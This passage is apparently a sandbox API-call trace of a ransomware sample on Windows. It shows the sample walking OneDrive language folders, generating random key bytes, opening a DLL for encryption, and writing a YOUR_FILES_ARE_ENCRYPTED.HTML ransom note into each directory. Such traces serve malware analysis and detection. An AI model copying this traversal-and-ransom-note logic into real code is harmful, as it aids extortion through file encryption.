ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.872] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.872] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.872] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.872] lstrlenW (lpString=".mui") returned 4 [0161.872] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.873] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa58278f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.873] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.873] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\lb-lu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.873] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.876] CloseHandle (hObject=0x5b8) returned 1 [0161.876] GetProcessHeap () returned 0x270000 [0161.877] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.877] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4353870, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4353870, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4353870, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1aca8, dwReserved0=0x0, dwReserved1=0x60, cFileName="LoggingPlatform.dll", cAlternateFileName="LOGGIN~1.DLL")) returned 1 [0161.877] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\LoggingPlatform.dll") returned 91 [0161.877] lstrcmpW (lpString1="LoggingPlatform.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.877] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0161.877] lstrlenW (lpString=".dll") returned 4 [0161.877] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0161.877] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0161.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\LoggingPlatform.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\loggingplatform.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0161.877] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa58278f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="lt", cAlternateFileName="")) returned 1 [0161.877] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt") returned 74 [0161.877] GetProcessHeap () returned 0x270000 [0161.877] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.877] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt" [0161.877] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\*" [0161.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa58278f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.878] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa58278f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.878] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.878] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.878] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.878] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.878] lstrlenW (lpString=".mui") returned 4 [0161.878] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.878] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.878] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.878] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\lt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.879] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.881] CloseHandle (hObject=0x5b8) returned 1 [0161.882] GetProcessHeap () returned 0x270000 [0161.883] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.883] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5d367b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="lv", cAlternateFileName="")) returned 1 [0161.883] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv") returned 74 [0161.883] GetProcessHeap () returned 0x270000 [0161.883] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.883] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv" [0161.883] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\*" [0161.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5d367b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.883] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5d367b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.883] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5d367b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5da8bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.883] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.883] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.883] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.884] lstrlenW (lpString=".mui") returned 4 [0161.884] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.884] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5d367b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5da8bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.884] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.884] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\lv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.884] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.887] CloseHandle (hObject=0x5b8) returned 1 [0161.887] GetProcessHeap () returned 0x270000 [0161.888] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.888] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5da8bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mi-nz", cAlternateFileName="")) returned 1 [0161.888] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz") returned 77 [0161.888] GetProcessHeap () returned 0x270000 [0161.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.888] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz" [0161.888] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\*" [0161.888] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5da8bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.889] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5da8bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.889] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.889] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.889] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.889] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.889] lstrlenW (lpString=".mui") returned 4 [0161.889] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.889] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.889] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.889] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mi-nz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.890] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.892] CloseHandle (hObject=0x5b8) returned 1 [0161.893] GetProcessHeap () returned 0x270000 [0161.893] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.894] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mk", cAlternateFileName="")) returned 1 [0161.894] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk") returned 74 [0161.894] GetProcessHeap () returned 0x270000 [0161.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.894] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk" [0161.894] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\*" [0161.894] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.894] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.895] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, 